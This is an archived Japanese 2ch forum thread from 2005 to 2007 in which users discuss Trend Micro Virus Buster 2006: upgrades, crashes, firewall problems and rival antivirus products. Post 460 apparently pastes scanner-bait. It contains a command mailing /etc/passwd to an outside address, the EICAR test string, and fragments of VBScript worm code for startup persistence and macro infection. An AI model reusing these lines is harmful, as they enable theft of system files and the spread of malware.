408 :名無しさん@お腹いっぱい。:2005/10/19(水) 08:51:39
あとひとり、あとひとり、あとひとり・・・・・・・・・


409 :名無しさん@お腹いっぱい。:2005/10/19(水) 10:46:40
さて、本スレとこちら、どっちが祭りになるか・・・?

410 :名無しさん@お腹いっぱい。:2005/10/19(水) 17:29:11
あとの祭り、あとの祭り、あとの祭り、・・・・・・・・・



411 :名無しさん@お腹いっぱい。:2005/10/19(水) 18:21:38
ウイルスバスター2006 インターネットセキュリティ
無料アップグレード開始!!!

http://www.trendmicro.com/jp/support/vbc/upgrade/related/overview.htm

412 :名無しさん@お腹いっぱい。:2005/10/19(水) 18:50:09
マジ来てるみたいだ
トレンドマイクロ必死だなwwwwwwwwwwwww

413 :名無しさん@お腹いっぱい。:2005/10/19(水) 18:56:31
γテストの始まりか

414 :名無しさん@お腹いっぱい。:2005/10/19(水) 19:15:18
ウイルスパターンファイルのアップデート後に、万が一、パソコンが停止・不正終了してしまったなどの
トラブルが発生した場合、状況分析を行い、状況に応じて、パターンファイルをアップデート前の状態に
自動復旧する機能を搭載しました。


これが、今回の一番の目玉だな(藁

415 :名無しさん@お腹いっぱい。:2005/10/19(水) 19:16:29
iTunes直ってなかった・・・

416 :名無しさん@お腹いっぱい。:2005/10/19(水) 19:25:23
が、俺の擦り傷は治った。

417 :名無しさん@お腹いっぱい。:2005/10/19(水) 20:31:36
2006年に○○2003とかいうソフトを使わなくて良いということだけが
唯一の売りだ

418 :>>1:2005/10/19(水) 20:43:58
じゃ、こっち終了の方向で

せっかく危険覚悟で立てたのに・・・来年はもう立てん

419 :名無しさん@お腹いっぱい。:2005/10/19(水) 22:13:37
めでたく2006をインスコしますた。
今までありがとう2005。

420 :名無しさん@お腹いっぱい。:2005/10/19(水) 22:15:51
2006ダウソ中
>>1

別スレにてまた会いましょう

421 :名無しさん@お腹いっぱい。:2005/10/20(木) 20:51:05
保守age

422 :名無しさん@お腹いっぱい。:2005/10/20(木) 20:51:46
すいません質問です。
マカフィーにはスパムキラーといってスパムメールを受信トレイに落とさない機能があったのですが、ウイルスバスターにはそういう機能がありますか?
新しく出る2006を購入するか悩んでいます。
2005の30日試用版にはそういう機能がないみたいなのですが。。

423 :名無しさん@お腹いっぱい。:2005/10/20(木) 21:11:47
>>422 はメーラー何使ってんの?

424 :名無しさん@お腹いっぱい。:2005/10/20(木) 21:50:23
>>423
oulook expressです

425 :名無しさん@お腹いっぱい。:2005/10/20(木) 22:16:32
2006入れたけど2005と比べてアップデートに時間がやたら掛かるような気が・・・

426 :名無しさん@お腹いっぱい。:2005/10/20(木) 22:34:29
なんか2006からインストール手順が若干変わってるな
2005までは以前のバージョンをアンインストールしてからじゃないと失敗してたけど
2006は自動で以前のバージョンがは入ってるのか確認してくれるんだな

これなら知識のない人でもインストール失敗を事前に防げるな

427 :名無しさん@お腹いっぱい。:2005/10/20(木) 22:38:49
>>424
ウイルスバスター2006単体では出来ない、が
迷惑メール対策ツールをインストールすれば出来る

↓こっちの方が良いかも
ウイルスバスター2005 Part41
http://pc8.2ch.net/test/read.cgi/sec/1128666331/

428 :名無しさん@お腹いっぱい。:2005/10/20(木) 22:46:29
>>422
avastにしとけ。


429 :名無しさん@お腹いっぱい。:2005/10/20(木) 22:58:44
布教乙。




そういうおいらも先月まではavastだった…。
昨日の20:27からVB2006うざになりやした。

430 :名無しさん@お腹いっぱい。:2005/10/20(木) 23:05:35
>>429
avastに戻って来い。
avastスレの仲間が待ってるぞ。

431 :名無しさん@お腹いっぱい。:2005/10/20(木) 23:27:14
これリアルタイム検索無効にしたらいけないの?

432 :名無しさん@お腹いっぱい。:2005/10/21(金) 00:06:31
>>427
>>428
色々教えてくれてありがとう

433 :名無しさん@お腹いっぱい。:2005/10/21(金) 00:32:28
>>430
だってwebシールド活かしたら青画面になっちゃうんだもの!
VBのスクリプトチェックは、とりあえず死なないからokっす。

434 :名無しさん@お腹いっぱい。:2005/10/21(金) 00:34:34
>>431
いけないってことはない。
それでも問題ない使い方なら、それで使えばいい。
でもリアルタイム検索使わないなら、フリー版でいーんじゃない?
(avastはフリーでもリアルタイムありだけど・・・と軽く宣伝)

435 :名無しさん@お腹いっぱい。:2005/10/21(金) 00:52:14
ウイルスバスター2005から2006に更新したら、
1日に3,4回は突然青い画面になって落ちるようになってしまったんだけど・・・
同じ現象になった方いますか?

436 :名無しさん@お腹いっぱい。:2005/10/21(金) 00:55:05
>>435
VBで死んだことは一度もないなぁ。
avastなら数回…。

437 :名無しさん@お腹いっぱい。:2005/10/21(金) 01:03:24
2006 うっぷかんりょう

438 :名無しさん@お腹いっぱい。:2005/10/21(金) 01:25:34
シリを教えて

439 :名無しさん@お腹いっぱい。:2005/10/21(金) 04:52:52
ん?オレのシリか?
割りと小振りでセクシーなシリだとよく言われる

440 :名無しさん@お腹いっぱい。:2005/10/21(金) 05:24:21
おまいら漏れのパソコンで2006は耐えれますか?

P4 2.8GHZ メモリ1G


441 :名無しさん@お腹いっぱい。:2005/10/21(金) 08:17:38
  ∧ ∧     ┌─────────────  .
  ( ´ー`)   < シラネーヨ
   \ <     └───/|────────
    \.\______// _____
      \   ∧ ∧   <チラネーヨ
       ∪∪(´ー`)_/|    ̄ ̄ ̄ ̄ ̄ ̄
            UU UU

442 :名無しさん@お腹いっぱい。:2005/10/21(金) 09:01:58
2006にしたら突然青画面になって落ちるようになったんだけど
2005に戻したいんだけどどのようにすればよいのでしょうか?

443 :名無しさん@お腹いっぱい。:2005/10/21(金) 09:03:38
>>440
メモリを2Gにすればまあ大丈夫だろ

444 :名無しさん@お腹いっぱい。:2005/10/21(金) 09:27:08
てことは256の俺は大変なことになりそうだ

445 :名無しさん@お腹いっぱい。:2005/10/21(金) 11:10:47
435と442は、釣りの予感。
わざわざageだし。

446 :名無しさん@お腹いっぱい。:2005/10/21(金) 11:22:33
2006のロゴがカコワルイ件について

447 :名無しさん@お腹いっぱい。:2005/10/22(土) 00:05:26
>>444
セレ2.4G
メモリ256
でも問題ないよ。2005よりいい感じ。

448 :名無しさん@お腹いっぱい。:2005/10/22(土) 02:21:48
2006にしたらウィンドウズ起動時にファイヤーウォールが無効になるようになった。
設定をつついて有効にしてやることもできない。
有効にするためには、ウイルスバスターを一回終了させてからウイルスバスターを
もう一度起動してやらなきゃならない。それはたいした手間ではないからいいといえばいいんだけど、
こういう不審な動作があること自体が不安にさせる要素だったりする。
なんかの常駐ソフトとぶつかってるのかなあ。

449 :名無しさん@お腹いっぱい。:2005/10/22(土) 09:04:15
2005より気持ち軽めな希ガス

450 :名無しさん@お腹いっぱい。:2005/10/22(土) 10:28:16
>>435>>442
俺も同じ症状、Windowsエラーの青画面がが出る。
そのあと、元に戻るけど、ブラウザのレスポンスが極端に悪くなる。


451 :名無しさん@お腹いっぱい。:2005/10/22(土) 12:15:02
パーソナルファイアウオールを設定したら
shareが通信しません_| ̄|○

452 :名無しさん@お腹いっぱい。:2005/10/22(土) 17:17:23
    そう落ち込むなって
.       ∧__∧
      ( ´・ω・)∧∧l||l
       /⌒ ,つ⌒ヽ)  
       (___  (  __)  
"''"" "'゙''` '゙ ゙゚' ''' '' ''' ゚` ゙ ゚ ゙''`
     

453 :名無しさん@お腹いっぱい。:2005/10/23(日) 00:26:38
β取れたスレ出来てます
【2005使いも】ウイルスバスター2006 Part1【歓迎】
ttp://pc8.2ch.net/test/read.cgi/sec/1129946596/

454 :名無しさん@お腹いっぱい。:2005/10/27(木) 15:35:56
で、本スレはどこだ?

455 :名無しさん@お腹いっぱい。:2005/10/27(木) 16:36:09
アホか。
ここはベータ時代に立てられたスレ。
さっさと本スレ逝け。いちいちageるな馬鹿。

456 :名無しさん@お腹いっぱい。:2005/10/27(木) 17:36:58
>>454
ウイルスバスター2006 Part2
ttp://pc8.2ch.net/test/read.cgi/sec/1130388608/

こっちはこのままdat落ち?
ウイルスバスター2005 Part42
ttp://pc8.2ch.net/test/read.cgi/sec/1129945481/

457 :名無しさん@お腹いっぱい。:2005/11/03(木) 23:47:11
【VB】ウィルスバスター2006 part3【TrendMicro】
http://pc8.2ch.net/test/read.cgi/sec/1131028942/

本スレ立てといた

458 :名無しさん@お腹いっぱい。:2005/11/07(月) 22:46:49
>>448
俺もその現象がおきてる・・

459 :名無しさん@お腹いっぱい。:2005/11/07(月) 23:41:16
>>448,458
事の顛末をトレンドに家

460 :名無しさん@お腹いっぱい。:2005/11/11(金) 12:20:55
cat /etc/passwd | mail nobody@nonexistent.com
http://bubble4.2ch.net/test/read.cgi/nendai/1128605930/
         ∧ ∧
        (・∀ ・)
        <(  )v

c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

461 :名無しさん@お腹いっぱい。:2005/11/11(金) 18:10:24
し・ん・で♪

462 :名無しさん@お腹いっぱい。:2006/03/08(水) 20:27:37
ウィルス注意

463 :名無しさん@お腹いっぱい。:2006/05/06(土) 23:05:04
 Irvine 1.09以降

464 :名無しさん@お腹いっぱい。:2006/10/06(金) 07:06:08
本スレ?

465 :名無しさん@お腹いっぱい。:2006/10/06(金) 10:10:53
たぶん

466 :名無しさん@お腹いっぱい。:2006/10/06(金) 11:11:13
じゃあこっち?

467 :名無しさん@お腹いっぱい。:2006/10/06(金) 11:52:19
皆で2006に戻ろうぜ

468 :名無しさん@お腹いっぱい。:2006/10/06(金) 11:53:27
2006のメリットってなんだ?

469 :名無しさん@お腹いっぱい。:2006/10/06(金) 11:59:28
軽い

これに尽きる

470 :名無しさん@お腹いっぱい。:2006/10/06(金) 14:36:10
【VB】ウイルスバスター2006 Part22【TrendMicro】
http://pc8.2ch.net/test/read.cgi/sec/1160052286/l50

471 :名無しさん@お腹いっぱい。:2006/10/07(土) 18:28:44
本スレ上げ

472 :名無しさん@お腹いっぱい。:2006/10/08(日) 06:36:52
2006って2007より快適ですか?

473 :名無しさん@お腹いっぱい。:2006/10/10(火) 13:58:09
もちろん

474 :名無しさん@お腹いっぱい。:2006/10/20(金) 13:16:13
どうやって2006に戻るの?

475 :474:2006/10/20(金) 15:20:17
自己解決しましたぁ〜

476 :名無しさん@お腹いっぱい。:2007/01/02(火) 12:30:01
バスターさん2006で満足してます(´・ω・`)
わかりやすくていいね

477 :名無しさん@お腹いっぱい。:2007/01/02(火) 13:07:41
\               U         /
  \             U        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \          /
     \ / く l   ヽ._.ノ   ', ゝ \       <  バーーカ!  >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)

118 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)